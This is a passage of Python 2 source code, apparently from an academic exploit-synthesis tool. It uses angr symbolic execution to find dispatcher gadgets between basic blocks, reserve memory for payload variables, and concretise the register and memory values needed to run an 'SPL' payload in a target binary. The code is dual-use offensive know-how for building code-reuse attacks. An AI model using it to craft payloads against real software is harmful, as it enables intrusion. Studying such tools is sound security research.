   # There's a problem when we concretize a symbolic variable that is already in \n        # __reserved_syms. For instance, if we set <BV64 rsi_713_64 + 0x30> at the 1st \n        # free slot of the pool, then <BV64 rsi_713_64 + 0x10> will point to a used area\n        # in the pool. This memory has already been marked as immutable, so the reservation\n        # will fail. To fix this, we \"shift\" the pool index to avoid these overlaps. 
Not a\n        # perfect solution, but it works :)\n        #\n        # Although we could use a different memory area for that, we keep everything on the same\n        # pool for simplicity.\n        self.__plsz += POOLVAR_GRANULARITY\n\n\n        self.__disable_hooks = True                 # disable hooks as we'll write to memory\n\n\n        for blk, rsvp in self.__rsvp.iteritems():   # for each basic block reservation\n\n            # check if it's the right time to do the reservation.\n            #\n            # (IMPORTANT) We can have >1 statements that use the same basic block, but the\n            # current induced subgraph (Hk) might use only one statement from this block.\n            # So, we cannot make the reservations based just on block addresses. We have\n            # to base our decisions on the UIDs as well, but then we can make one reservation\n            # at a time. This is NOT an issue as long as Hk has multiple nodes that correspond\n            # to the same basic block, so we'll have transitions from a block to itself.\n            if blk != cur_blk:\n                continue\n\n            for (uid, addr, sym, val) in rsvp:      # for each statement reservation in this block\n                if uid != cur_uid:                  # check UID as well\n                   continue\n\n\n                print "RSVP ADDR:", addr, val\n\n\n                reg = [r for v, r in self.__regmap if v == '__r%d' % self.__IR[uid]['reg']][0]\n\n\n\n                self.unchecked_regsets.append( (reg, self.__IR[uid]['val']) )\n\n\n                # If we have a double pointer, load the variable's address from the vartab\n                # (__init_vars() ensures that __vartab[val[0]] exists and is a valid integer address)\n                if addr[0] == '*':\n                    addr = addr[1:]                 # drop asterisk\n                    val  = self.__vartab[ val[0] 
]\n\n\n\n                for leaf in STR2BV[addr].recursive_leaf_asts:\n                    if leaf.shallow_repr() in SYM2ADDR:\n\n                        print 'ADD constraint', leaf, hex(SYM2ADDR[leaf.shallow_repr() ][0])#, self.__mwrite(state, SYM2ADDR[leaf], 8, leaf)\n                        #self.__state.add_constraints(leaf == self.__mwrite(state, SYM2ADDR[leaf], 8, leaf))\n                        self.FOO.append(leaf)\n                        self.__sym[ SYM2ADDR[leaf.shallow_repr() ][0] ] = leaf\n\n\n                # check if the address depends on symbolic registers \n                # (e.g. <BV64 rsi_713_64 + 0x10>).\n                #\n                # Otherwise, the address is constant, so we directly write to it.\n                for reg, symreg in sym.iteritems(): # {'rsi': <BV64 rsi_713_64>} pairs\n\n                    # if a register has already been used in a reservation, we don't add more\n                    # constraints as we'll probably make it un-satisfiable. For example, if\n                    # we have the RSVPs <BV64 rsi_713_64 + 0x10> and <BV64 rsi_713_64 + 0x30>,\n                    # we constrain rsi_713_64 only once.\n\n\n                    if symreg not in self.__reserved_syms:\n                        self.__reserved_syms.add( symreg )\n\n                        # print 'add_constraints', symreg, STR2BV[addr]\n\n                        # UPDATE: We may not need to add constraints. It's possible to already\n                        #   have some constraints with addresses from the allocator, so when\n                        #   we add pool addresses, we make them unsatisfiable. 
That is, we \n                        #   can implicitly have an address for a reservation outside of the pool.\n                        #   For example:\n                        #\n                        #       <Bool mem_795_64 != 0x0>\n                        #       <Bool (mem_795_64 + 0x10) == 0xd800100f>\n                        #       <Bool mem_795_64 == r13_292906_64>\n                        #\n                        # If we now try to add the following constraint:\n                        #       <Bool (r13_292906_64 + 0x38) == 0xca002028>\n                        # \n                        # we'll make the constraints unsatisfiable. Thus, we don't have to add the\n                        # last constraint when it already has a single solution.\n\n\n\n                        # The symbolic variable in symreg is different from the one in state.regs.*.\n                        # To deal with it, we add 2 constraints: first, we require that these two\n                        # symbolic variables (symreg and state.regs.*) are equal, and second, we \n                        # require that the symbolic address points to an address in the pool.\n                        state.add_constraints(self.__getreg(reg, state) == symreg)\n\n                        state_copy = state.copy()                        \n\n                        # this can be unsatisfiable. Try it on a copy of the state\n                        x = state.se.BVS('x', 64)\n                        \n                        state_copy.add_constraints(x == POOLVAR_BASE_ADDR + self.__plsz)\n                        state_copy.add_constraints(STR2BV[addr] == x)\n\n\n                        print 'state.satisfiable():', state_copy.satisfiable(), state_copy.se.satisfiable()\n\n                        if not state_copy.satisfiable():\n                            dbg_prnt(DBG_LVL_2, \"Reservation constraint was un-satisfiable. 
Rolling back...\")\n\n                            del state_copy\n                        else:\n                            # constraint is ok; add it to the real state\n                            x = state.se.BVS('x', 64)\n                        \n                            state.add_constraints(x == POOLVAR_BASE_ADDR + self.__plsz)\n                            state.add_constraints(STR2BV[addr] == x)\n\n                            # TODO: comment!\n                            self.__relative[POOLVAR_BASE_ADDR + self.__plsz] = \\\n                                                                '$pool + 0x%03x' % self.__plsz\n\n                            self.__plsz += 8            # update pool\n\n                            del state_copy\n\n\n                # print 'FINAL CONSTRAINTS', state.se.constraints\n\n                try:\n                    # 'addr' is a string with a symbolic expression. Convert it back to a\n                    # bitvector and concretize it\n                    con_addr = state.se.eval(STR2BV[addr])\n\n                    print 'con_addr', hex(con_addr)\n\n                    # The stack address in the basic block is different from the one in the\n                    # current path. 
So readjust it (TODO: Do it in a less sloppy way)\n                    # TODO: !!!!!!!\n                    if abs(con_addr - RSP_BASE_ADDR) < 0x1000:\n                        con_addr = (con_addr - RSP_BASE_ADDR) + state.se.eval(state.regs.rsp)\n                        print 'CON', state.regs.rsp, hex(state.se.eval(state.regs.rsp))\n                        print 'CONCON', hex(con_addr)\n                        #  exit()\n\n\n\n                    # -------------------------------------------------------------------------\n                    # RSVPs like this: '<BV64 Reverse(stack_9618_262144[258175:258112]) + 0x18>'\n                    #       get concretized to 0x18, so make sure that the memory is writable\n                    #       (+W) before you concretize\n                    #\n                    # Update: We miss solutions here. Instead of discarding them, initialize them\n                    # somewhere __alloc_un\n                    #\n                    writable = True\n                    in_section = False\n                    try:                    \n                        for _, sec in self.__proj.loader.main_object.sections_map.iteritems():\n                            if sec.contains_addr(con_addr):\n                                print 'sec.is_writable', sec.is_writable\n                                writable &= sec.is_writable\n                                in_section = True\n                        \n                        if not in_section:\n                            rwx = state.memory.permissions(con_addr)\n                            print 'rwx', rwx\n                            writable = (state.se.eval(rwx) & 2 == 2)\n                    except Exception, e:\n                        writable = False                        \n                    # 
-------------------------------------------------------------------------\n\n                    if not writable:\n                        warn(\"RSVP concretized but it has an invalid address '0x%x'\" % con_addr)\n                        # return False\n\n                        # give it a second chance\n                        self.__alloc_un(state, STR2BV[addr])\n                        \n                        con_addr = state.se.eval(STR2BV[addr])\n\n\n                except angr.errors.SimUnsatError:   # un-satisfiable constraints\n                    dbg_prnt(DBG_LVL_2, \"Reservation was un-satisfiable. Discard current path.\")\n                    print 'SSSSS', self.__state.se.constraints\n                    return False                    # reservation failed\n                \n                except Exception, e:\n                    dbg_prnt(DBG_LVL_2, \"Unknown Exception '%s'. Discard current path.\" % str(e))\n                    return False                    # reservation failed\n\n\n                # if this address has already been written in the past, any writes will\n                # be overwritten, so discard the current path                \n                #if con_addr in self.__mem or con_addr in self.__imm or (con_addr + 7) in self.__imm:\n                if con_addr in self.__imm or (con_addr + 7) in self.__imm:\n                    dbg_prnt(DBG_LVL_2, \"RSVP 0x%x has already been written or it's immutable. \"\n                                        \"Discard current path.\" % con_addr)\n\n                    return False                    # reservation failed\n\n\n                # write the value byte-by-byte. 
The memory address must also be marked immutable\n                p_val = struct.pack(\"<Q\", val)\n\n                # print 'WRITING:', hex(val), 'at ', hex(con_addr)\n\n                # this was problematic (endianness was wrong)\n                # self.__mwrite(state, con_addr, 8, p_val)\n                \n\n                # before we write the value, check if the contents of this address are already\n                # in the constraints\n                symv = self.__mread(state, con_addr, 8)\n                print 'PRIOR VALUE at', hex(con_addr), '::', symv\n                if self.__in_constraints(symv) or [V for V in self.__inireg.values() if V.shallow_repr() == symv.shallow_repr()]:\n                    dbg_prnt(DBG_LVL_2, \"RSVP already in constraints!\")\n                else:\n                    symv = None\n\n\n                for i in range(8):                    \n                    state.memory.store(con_addr + i, p_val[i])\n                    self.__imm.add(con_addr + i)    # mark immutable addresses at byte granularity\n\n\n                # add reservation to memory\n                self.__mem[ con_addr ] = (val, 8)\n\n                dbg_prnt(DBG_LVL_2, \"Writing RSVP *0x%x = 0x%x\" % (con_addr, val))\n\n                if symv is not None:\n                    # add the new constraint\n                    state.add_constraints(symv == val)\n\n                    if not state.satisfiable():\n                        dbg_prnt(DBG_LVL_2, \"RSVP caused constraints to be unsatisfiable. 
Discard path.\")\n                        return False\n\n                # print '$$$$$$$$$$$$$$$$$$$$$$$$$', self.__mread(state, con_addr, 8)\n\n        # print 'FINITO MEM_RSVPz', state.satisfiable(), state.se.satisfiable()\n        # print 'CONSTRAINTS', state.se.constraints\n        \n        self.__disable_hooks = False                # enable hooks again\n\n        return True                                 # reservation was successful\n\n\n\n    # ---------------------------------------------------------------------------------------------\n \n    ''' ======================================================================================= '''\n    '''                          INTERNAL FUNCTIONS - TRACE MANAGEMENT                          '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __simulate_subpath(): This internal function performs the actual symbolic execution for\n    #       the candidate subpath. It guides the symbolic execution through the specific subpath.\n    #\n    # :Arg sublen: The length of the subpath\n    # :Arg subpath: The actual subpath\n    # :Arg mode: The simulation mode for each step\n    # :Ret: If the subpath can be simulated successfully, function returns the new state for the\n    #       symbolic execution. 
Otherwise, function returns None.\n    #\n    def __simulate_subpath( self, sublen, subpath, mode ):\n        emph(\"Trying subpath (%d): %s\" % (sublen, \n                        ' -> '.join(['0x%x' % p for p in subpath])), DBG_LVL_2)\n   \n \n        self.__disable_hooks = False                # enable hooks\n\n        # Register the signal function handler\n        signal.signal(signal.SIGALRM, self.__sig_handler)\n\n        # clone the current state (so we can revert if subpath extension fails)\n        self.stash_context()\n\n        state = self.__state.copy()\n\n        # create the simulation manager object\n        simgr = self.__proj.factory.simulation_manager(thing=state)\n        # angr.manager.l.setLevel(logging.ERROR)\n        \n\n        found = simgr.active[0]                     # a.k.a. state\n        \n        dbg_arb(DBG_LVL_3, \"BEFORE Constraints: \", found.se.constraints)\n\n        # guide the symbolic execution: move from basic block to basic block\n        for blk in subpath[1:]:\n            simgr.drop(stash='errored')             # drop errored stashes\n            signal.alarm(SE_TRACE_TIMEOUT)          # define a timeout for the SE engine\n\n\n            self.__sim_mode = mode.pop(0)\n\n            try:\n                dbg_prnt(DBG_LVL_3, \"Next basic block: 0x%x\" % blk)\n                # simgr.explore(find=blk)             # try to move on to the next block\n                # simgr.step()\n\n\n                node = ADDR2NODE[found.addr]\n                # print 'NODE ', node, len(node.instruction_addrs)\n\n                num_inst = len(node.instruction_addrs) if node is not None else None\n                if num_inst:\n                    simgr.step(num_inst=num_inst)\n\n                else:\n                    NEW = simgr.step()\n                    # print 'NEW', NEW, NEW.errored\n\n\n            except Exception, msg:                   \n                dbg_prnt(DBG_LVL_3, \"Subpath failed. 
Exception raised: '%s'\" % bolds(str(msg)))\n                found = None                        # nothing found\n                break                               # abort\n\n            signal.alarm(0)                         # disable alarm\n\n            if not simgr.active:\n                # print 'Stashes', simgr.stashes\n                dbg_arb(DBG_LVL_3, \"Constraints: \", found.se.constraints)\n\n                dbg_prnt(DBG_LVL_3, \"Subpath failed (No 'active' stashes)\")\n                found = None                        # nothing found\n                break                               # abort\n        \n    \n            #print 'Stashes', simgr.stashes\n\n            found = None                     # nothing found\n\n            # print 'Stashes', simgr.stashes            \n            # print 'state.satisfiable():', simgr.active[0].satisfiable()\n\n            # drop any 'active' stashes and make the 'found' stashes active, so we\n            # can continue the search           \n            simgr.move(from_stash='active', to_stash='found', \\\n                            filter_func=lambda s: s.addr == blk)\n            \n            simgr.drop(stash='active')\n            simgr.move(from_stash='found', to_stash='active')\n                    \n            \n            if simgr.active:\n                found = simgr.active[0]             # TODO: Shall we use .copy() here?\n\n                dbg_prnt(DBG_LVL_3, \"Block 0x%x found!\" % blk)\n                dbg_arb(DBG_LVL_3, \"Constraints: \", found.se.constraints)\n                \n            # print 'FOUND IS ', found\n            # self.__sim_mode = SIM_MODE_DISPATCH\n            \n\n        if not found:                               # if nothing found, drop the cloned state\n            print 'Stashes', simgr.stashes\n\n            self.unstash_context()\n            del state\n        else:            \n            self.drop_context_stash()\n            dbg_prnt(DBG_LVL_3, \"Subpath simulated 
successfully!\")\n\n        signal.alarm(0)                             # disable alarm\n\n        self.__disable_hooks = True                 # hooks should be disabled        \n\n        return found                                # return state (if any)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n\n    ''' ======================================================================================= '''\n    '''                                     CLASS INTERFACE                                     '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __init__(): Class constructor. Create and initialize a blank state and prepare the\n    #       environment for the symbolic execution.\n    #\n    # :Arg project: Instance of the angr project\n    # :Arg cfg: Binary's CFG\n    # :Arg clobbering: Dictionary of clobbering blocks\n    # :Arg adj: The SPL adjacency list\n    # :Arg IR: SPL's Intermediate Representation (IR)\n    # :Arg varmap: The variable mapping\n    # :Arg regmap: The register mapping\n    # :Arg rsvp: The reserved memory addresses for variables\n    # :Arg entry: Payload's entry point\n    #\n    def __init__( self, project, cfg, clobbering, adj, IR, regmap, varmap, rsvp, entry ):\n        self.__proj = project                       # store arguments internally\n        self.__cfg  = cfg\n        self.__IR   = IR\n        self.__rsvp = rsvp\n        self.__regmap = regmap\n\n        self.__imm    = set()                       # immutable addresses\n        self.__sym    = { }                         # symbolic variables\n        self.__inireg = { }                         # initial register symbolic variables\n\n        self.__reg = { }                            # final output for registers,\n        self.__mem = { }                     
       # memory and\n        self.__ext = { }                            # external data (from files, sockets, etc.)\n\n\n        # 0xca00013b is actually pool_base + 0x13b\n        self.__relative = { }\n        \n        self.condreg = ''\n        # regsets that are not checked after block execution\n        self.unchecked_regsets = []\n\n        # even though we avoid all clobbering blocks in our path, this doesn't mean that\n        # registers may not get clobbered. This usually happens inside system or library calls\n        # where registers are being changed, even though there are no clobbering blocks.\n        # \n        # to deal with it, we simply mark a register as immutable after \n        #\n        # all registers that are used by SPL are immutable (only functional blocks can modify them)\n        #        \n        self.__imm_regs = set()                     # initially empty; add registers on the fly\n        #self.__imm_regs = set([real for _, real in regmap])\n\n        self.__sim_mode = SIM_MODE_INVALID\n\n        self.FOO = []\n\n#        print 'RSVPs', \n#        for addr, x in sorted(rsvp.iteritems()):\n#            print hex(addr), x\n\n\n        # the base address at which uninitialized symbolic variables should be allocated. \n        # don't start from 0, to catch allocations that start BEFORE the initial base (e.g. 
if \n        # [rax + 0x20] = ALLOC, then rax will be below the allocator)\n        self.__alloc_size = 0x100          \n        \n        # create a CFG shortest path object\n        self.__cfg_sp = path._cfg_shortest_path(self.__cfg, clobbering, adj)\n\n        # create a symbolic execution state\n        self.__state = self.__proj.factory.call_state(\n                                    mode       = 'symbolic', \n                                    addr       = entry, \n                                    stack_base = STACK_BASE_ADDR, \n                                    stack_size = 0x10000\n                        )\n\n\n        # initialize all registers with a symbolic variable\n        self.__state.regs.rax = self.__state.se.BVS(\"rax\", 64)\n        self.__state.regs.rbx = self.__state.se.BVS(\"rbx\", 64)\n        self.__state.regs.rcx = self.__state.se.BVS(\"rcx\", 64)\n        self.__state.regs.rdx = self.__state.se.BVS(\"rdx\", 64)\n        self.__state.regs.rsi = self.__state.se.BVS(\"rsi\", 64)\n        self.__state.regs.rdi = self.__state.se.BVS(\"rdi\", 64)\n        \n        # rsp must be concrete and properly initialized\n        self.__state.registers.store('rsp', RSP_BASE_ADDR, size=8)\n\n        # rbp may also be needed as it's mostly used to access local variables (e.g., \n        # rax = [rbp-0x40]) but some binaries don't use rbp and all references are\n        # rsp related. 
In these cases it may be worth using rbp as well.\n        if MAKE_RBP_SYMBOLIC:\n            self.__state.regs.rbp = self.__state.se.BVS(\"rbp\", 64)\n        else:\n            self.__state.registers.store('rbp', FRAMEPTR_BASE_ADDR, size=8)        \n\n        self.__state.regs.r8  = self.__state.se.BVS(\"r08\", 64)\n        self.__state.regs.r9  = self.__state.se.BVS(\"r09\", 64)\n        self.__state.regs.r10 = self.__state.se.BVS(\"r10\", 64)\n        self.__state.regs.r11 = self.__state.se.BVS(\"r11\", 64)\n        self.__state.regs.r12 = self.__state.se.BVS(\"r12\", 64)\n        self.__state.regs.r13 = self.__state.se.BVS(\"r13\", 64)\n        self.__state.regs.r14 = self.__state.se.BVS(\"r14\", 64)\n        self.__state.regs.r15 = self.__state.se.BVS(\"r15\", 64)\n\n\n        # remember the initial symbolic variables for the registers\n        self.__inireg = { r : self.__getreg(r) for r in HARDWARE_REGISTERS }\n\n\n        # initialize SPL variables        \n        self.__init_vars( varmap )  # this can throw an exception\n      \n\n        # An alternative way to enable/disable hooks is this:\n        #       s = state.inspect.b('mem_write', ...)\n        #       s.enabled = False\n        self.__disable_hooks = False                # enable breakpoints \n       \n        self.__state.inspect.b('mem_write', when=angr.BP_BEFORE, action=self.__dbg_write_hook )\n        self.__state.inspect.b('mem_read',  when=angr.BP_BEFORE, action=self.__dbg_read_hook  )  \n        self.__state.inspect.b('reg_write', when=angr.BP_BEFORE, action=self.__dbg_reg_wr_hook)\n        self.__state.inspect.b('symbolic_variable', \n                                            when=angr.BP_AFTER,  action=self.__dbg_symv_hook  )\n        self.__state.inspect.b('call',      when=angr.BP_AFTER, action=self.__dbg_call_hook   )\n        \n\n\n        self.__origst = self.__state.copy()         # create a copy of the original state\n\n\n        # expose internal state (these are references, not copies)\n        self.imm           = 
self.__imm\n        self.sym           = self.__sym\n        self.inireg        = self.__inireg\n        self.reg           = self.__reg\n        self.mem           = self.__mem\n        self.ext           = self.__ext\n        self.relative      = self.__relative\n        self.imm_regs      = self.__imm_regs\n        self.alloc_size    = self.__alloc_size\n        self.state         = self.__state        \n        self.disable_hooks = self.__disable_hooks = False                # enable breakpoints         \n\n\n        self.project    = project\n        self.cfg        = cfg\n        self.clobbering = clobbering\n        self.adj        = adj\n        self.IR         = IR\n        self.regmap     = regmap\n        self.varmap     = varmap\n        self.rsvp       = rsvp\n        self.entry      = entry\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __check_regsets(): TODO:\n    #\n    # Some RSVPs have weird addresses that we can't even concretize right before the block execution:\n    #   <Bool (Reverse(symbolic_read_unconstrained_277383_64) + (r13_277379_64 << 0x3)) == x_472_64>\n    #\n    # This means that our reservation will be wrong and the register will never be assigned the\n    # right value. A quick patch here is to check whether the register gets concretized to the\n    # right value after the block execution, and if not, we add the desired constraint\n    #\n    # <Bool (0#32 .. 
(mem_d8003100_481_64[31:0] & 0xf8000000)) != 0x30000000>]\n    #\n    def __check_regsets( self, state=None ):\n        if not state:\n            state = self.__state\n\n        # print '^^^^^^^^^^^^^^', self.unchecked_regsets\n\n\n        for reg, val in self.unchecked_regsets:\n            if isinstance(val, tuple):\n                warn('Oops!')\n\n            else:\n                if state.se.eval( self.__getreg(reg, state) ) != val:\n                    \n                    warn('Wrong concretized value! Fixing it.... %x != %x' %                        \n                            (state.se.eval( self.__getreg(reg, state) ), val))\n\n                    # print '-----------> ',  reg, self.__getreg(reg, state)\n                    state.add_constraints(self.__getreg(reg, state) == val)\n\n                    if not state.satisfiable():\n                        dbg_prnt(DBG_LVL_2, \"Reservation constraint was un-satisfiable. Rolling back...\")\n\n                        self.unchecked_regsets = [] # all registers are checked!\n                        return False                # check failed\n\n        self.unchecked_regsets = []                 # all registers are checked!\n\n        return True\n\n\n    \n    # ---------------------------------------------------------------------------------------------\n    # simulate_edge(): This function is invoked for every edge in the induced subgraph Hk and it\n    #       performs a symbolic execution from one accepted block to another. Essentially, its\n    #       purpose is to find a \"dispatcher gadget\" (i.e., a sequence of non-clobbering blocks)\n    #       between two SPL statements.\n    #\n    #       Unfortunately, the symbolic execution engine may take forever to move from one\n    #       accepted block to the other. To address this issue, we \"guide\" the symbolic execution\n    #       by selecting the exact subpath that it will follow. 
This path, however, is just an \n    #       estimate, so it may not be correct. Therefore, simulate_edge() quickly generates\n    #       candidate subpaths, starting from the shortest one.\n    #\n    #       simulate_edge() generates PARAMETER_P different subpaths. However, if we let it\n    #       generate all possible paths, the result will be the same as the unguided symbolic\n    #       execution.\n    #\n    # :Arg currb: Address of the current basic block\n    # :Arg nextb: Address of the basic block that we want to reach\n    # :Arg uid: Current UID of the payload\n    # :Arg loopback: A boolean indicating whether we should simulate a path or a loop\n    # :Ret: If function can extend the path, it returns the basic block path. Otherwise, it returns\n    #   None.\n    #\n    def simulate_edge( self, currb, nextb, uid, loopback=False ):\n        dbg_prnt(DBG_LVL_2, \"Simulating edge (0x%x, 0x%x) for UID = %d\" % (currb, nextb, uid))\n\n\n        # indicate the boundaries \n#        self.__blk_start = currb\n#        self.__blk_end   = currb + ADDR2NODE[currb].size\n#\n#        print 'BLK START', hex(self.__blk_start)\n#        print 'BLK ENDDD', hex(self.__blk_end)\n\n\n#        for a in self.__imm: print 'self.__imm', hex(a)        \n\n        # Check if the current basic block matches the address of the current state\n        if currb != self.__state.addr:              # base check            \n            raise Exception('Illegal transition from current state ' \n                        '(starts from 0x%x, but state is at 0x%x)' % (currb, self.__state.addr))\n\n        if loopback and currb != nextb:             # base check\n            raise Exception('Loopback mode on distinct blocks')\n\n\n        # apply any memory reservations (even if currb == nextb)   \n        if not self.__mem_RSVPs( self.__state, cur_uid=uid, cur_blk=currb ):\n            return None\n\n\n        # print 'SELF CON', self.__state.se.constraints\n\n\n\n        
self.__disable_hooks = True\n        \n        for var in self.FOO:\n            # print ' var', str(var)\n            if var.shallow_repr() in SYM2ADDR:\n                addr, size = SYM2ADDR[var.shallow_repr()]\n\n                MEM = self.__mread(self.__state, SYM2ADDR[var.shallow_repr()][0], \n                                                 SYM2ADDR[var.shallow_repr()][1])\n\n                if \"mem_\" not in MEM.shallow_repr():\n                    self.__init_mem(self.__state, addr, size)\n        \n                    MEM = self.__mread(self.__state, SYM2ADDR[var.shallow_repr()][0], \n                                                     SYM2ADDR[var.shallow_repr()][1])\n\n\n               # print 'QQ', SYM2ADDR[var.shallow_repr()], '%%%%', len(var), '==', len(MEM), '|', var, '?', MEM\n                \n                \n                if len(var) != len(MEM):                                    \n                    error('Symbolic variable alias found but size is inconsistent. 
Discard current path...')                    \n\n                # if it's already a concrete value, don't add a constraint\n                else:\n                    # print 'ADD CONSTRAINT FOO', var, MEM\n                    self.__state.add_constraints(var == MEM)\n                \n            else:\n                pass\n            \n        # print 'ok'\n\n\n        # update the immutable register set\n        if self.__IR[uid]['type'] == 'regset':\n            \n            reg = [r for v, r in self.__regmap if v == '__r%d' % self.__IR[uid]['reg']][0]\n\n            dbg_prnt(DBG_LVL_3, \"Adding register '%s' to the immutable set.\" % reg)\n            self.__imm_regs.add(reg)\n\n\n        # ---------------------------------------------------------------------\n        # Loopback mode\n        # ---------------------------------------------------------------------\n        if loopback:\n            dbg_prnt(DBG_LVL_2, \"Simulating a loop, starting from 0x%x ...\" % self.__state.addr)\n            \n            # guide the symbolic execution: generate P shortest loops\n            for length, loop in self.__cfg_sp.k_shortest_loops(currb, uid, PARAMETER_P):\n\n                if length > MAX_ALLOWED_SUBPATH_LEN:    # if loop is too long, discard it\n                    # This won't happen as the same check happens inside path.py, but we \n                    # should keep modules independent \n\n                    dbg_prnt(DBG_LVL_3, \"Loop is too big (%d). 
Discard current path ...\" % length)\n                    break\n            \n\n                mode = [SIM_MODE_FUNCTIONAL] + [SIM_MODE_DISPATCH]*(len(loop)-2) + [SIM_MODE_FUNCTIONAL]\n\n                # if we need to simulate the loop multiple times, we unroll the current loop\n                # by a constant factor\n                if SIMULATED_LOOP_ITERATIONS > 2:\n                    loop = loop[:-1]*(SIMULATED_LOOP_ITERATIONS-1)\n                    mode = mode[:-1]*(SIMULATED_LOOP_ITERATIONS-1)\n\n                # warn('LOOP IS %s' % pretty_list(loop))\n\n                # do the actual symbolic execution and verify that the loop is correct\n                nextst = self.__simulate_subpath(length, loop, mode)\n\n                if nextst != None:                      # success!\n                    emph(\"Edge successfully simulated.\", DBG_LVL_2)\n\n                    del self.__state                    # we don't need the current state\n                    self.__state = nextst               # update state\n\n                    return loop                         # return subpath\n            \n\n        # ---------------------------------------------------------------------\n        # Path mode\n        # ---------------------------------------------------------------------                    \n        else:\n            # guide the symbolic execution: generate P shortest paths\n            for slen, subpath in self.__cfg_sp.k_shortest_paths(currb, nextb, uid, PARAMETER_P):\n\n                if slen > MAX_ALLOWED_SUBPATH_LEN:      # if subpath is too long, discard it\n                    break\n\n\n                mode = [SIM_MODE_FUNCTIONAL] + [SIM_MODE_DISPATCH]*(len(subpath)-1)\n\n                # do the actual symbolic execution and verify that the subpath is correct\n                nextst = self.__simulate_subpath(slen, subpath, mode)\n\n                if nextst != None:                      # success!\n                    dbg_prnt(DBG_LVL_2, \"Edge successfully 
simulated.\")\n\n                    if slen > 0:\n                        # print 'unchecked_regsets', self.unchecked_regsets\n                        self.__check_regsets(nextst)\n\n\n                    del self.__state                    # we don't need current state\n                    self.__state = nextst               # update state\n            \n                    return subpath                      # return subpath\n\n\n                # TODO: !!!\n                #   All paths that endup in some loop here get exeuted exactly once. #\n                #   It's very hard to follow and simulate > 1 times here. We leave it\n                #   as a future work.\n\n        # we cannot simulate this edge. Try another induced subgraph\n        dbg_prnt(DBG_LVL_2, \"Cannot simulate egde. Discarding current induced subgraph...\")\n        \n        return None                             # no subpath to return\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # finalize(): The symbolic variables that are part of the constraints and get overwritten\n    #       are concretized during the symbolic execution (__dbg_write_hook). However there are \n    #       other symbolic variables that are part of the constraints, but they don't get\n    #       overwritten. 
This function concretizes symbolic variables left in final staet.\n    #\n    # :Ret: None.\n    #\n    def finalize( self ):       \n        # ---------------------------------------------------------------------\n        # TODO: Having a primitive to set registers may be useless.\n        #       Give the option to the attacker to be able to discard solutions\n        #       that use apriori registers\n        #\n        # ---------------------------------------------------------------------\n        dbg_prnt(DBG_LVL_0, 'Finalizing Apriori Register Assignments (if any):')\n\n            # for reg, val in self.__reg.iteritems():\n            #     # tuples are not part of the constraints and therefore are discarded\n            #     if isinstance(val, tuple):\n            #         pass\n\n        for reg, symv in self.__inireg.iteritems():           \n            \n            # check if any of the original register is still in the constraints\n            if self.__in_constraints(symv):\n                val = self.__state.se.eval(symv)\n                self.__inireg[ reg ] = val\n\n                emph('Apriori register found: %s = 0x%x' % (reg, val), DBG_LVL_0)\n\n            else:\n                self.__inireg[ reg ] = None\n\n        if self.condreg:\n            symv = self.__getreg(self.condreg)           \n            print '--------------- CONDREG', self.condreg, symv\n            \n            if self.__in_constraints(symv):\n                val = self.__state.se.eval(symv)\n                emph('Conditional register found: %s = 0x%x' % (self.condreg, val), DBG_LVL_0)\n\n                self.condreg = (self.condreg, val)\n\n            else:\n                self.condreg = ''                \n\n        # ---------------------------------------------------------------------\n        # Concretize leftovers\n        # ---------------------------------------------------------------------       \n        dbg_prnt(DBG_LVL_2, 'Finalizing %d memory 
addresses...' % len(self.__mem))\n\n        for addr, val in self.__mem.iteritems():\n            dbg_prnt(DBG_LVL_3, 'Inspecting address 0x%x ...' % addr)\n\n            # if __mem[addr] is in the form (value, size), then it's already concretized,\n            # so don't take any actions            \n            if isinstance(val, tuple):\n                continue\n\n            # if address is not concretized already and it's in the symbolic variable set\n            if addr in self.__sym and val > 0:\n                symv = self.__sym[ addr ]           # get symbolic variable\n\n                if self.__in_constraints(symv):     # if part of the constraints, concretize it\n                    realval          = self.__state.se.eval(symv)\n                    self.__mem[addr] = (realval, val)\n\n                    emph('\\tAddress/Value pair found: *0x%x = 0x%x (%d bytes)' % \n                            (addr, realval, val), DBG_LVL_2)\n\n\n                    if addr in self.__ext.values():\n                        dbg_prnt(DBG_LVL_2, '\\tAddress holds an external symbolic variable!')\n\n                else:\n                    dbg_prnt(DBG_LVL_3, '\\tAddress is not in the constraints.')\n                    self.__mem[ addr ] = None           # discard address\n\n            else:\n                self.__mem[ addr ] = None           # discard address\n                dbg_prnt(DBG_LVL_3, '\\tAddress is not needed.')\n\n\n        # TODO: This case \"SYM DICT: 0xd8001000 <BV64 __add__(0xa, r12_562_64, r14_564_64)>\"\n        # will give wrong results when concretized if r12 is relative\n\n        # for a, b in self.__sym.iteritems():\n        #     print 'SYM DICT:', hex(a), b\n        \n\n        # ---------------------------------------------------------------------\n        # Concretize external input\n        # ---------------------------------------------------------------------       \n        dbg_prnt(DBG_LVL_0, 'External Input (if any): ')        \n\n 
       for var, addr in self.__ext.items():                \n            dbg_prnt(DBG_LVL_3, \"Inspecting external input '%s'\" % var.shallow_repr())\n\n            # print var, addr\n\n\n            # ---------------------------------------------------------------------\n            # Some external variables may be part of the constraints, but not\n            # written to memory\n            # ---------------------------------------------------------------------       \n            if addr == EXTERNAL_UNINITIALIZED:\n                concr = False\n\n\n                if self.__in_constraints(var):\n                    concr = True\n                    ext = var.shallow_repr()\n\n                elif SYMBOLIC_FILENAME in var.shallow_repr():\n                    # print 'insize ;)'\n\n                    \n                    # check again if it's in the constraints\n                    for constraint in self.__state.se.constraints:\n                        # treat constraint as an AST and iterate over its leaves\n                        for leaf in constraint.recursive_leaf_asts:\n                            # we can't compare them directly, so we cast them into strings first\n                            # (not a very \"clean\" way to do that, but it works)\n                            if SYMBOLIC_FILENAME in leaf.shallow_repr():\n                                concr = True\n                                ext = SYMBOLIC_FILENAME\n\n                    \n                if concr:\n                    value = self.__state.se.eval(var)\n\n                    dbg_prnt(DBG_LVL_3, 'External value (%s) found: 0x%x' % \n                                            (ext, value))\n\n                    self.__ext[ var ] = (addr, value)\n\n                else:\n                    dbg_prnt(DBG_LVL_3, 'External value is not needed.')\n\n                continue\n\n\n            elif addr == None or addr not in self.__sym:\n                warn('External symbolic variable is 
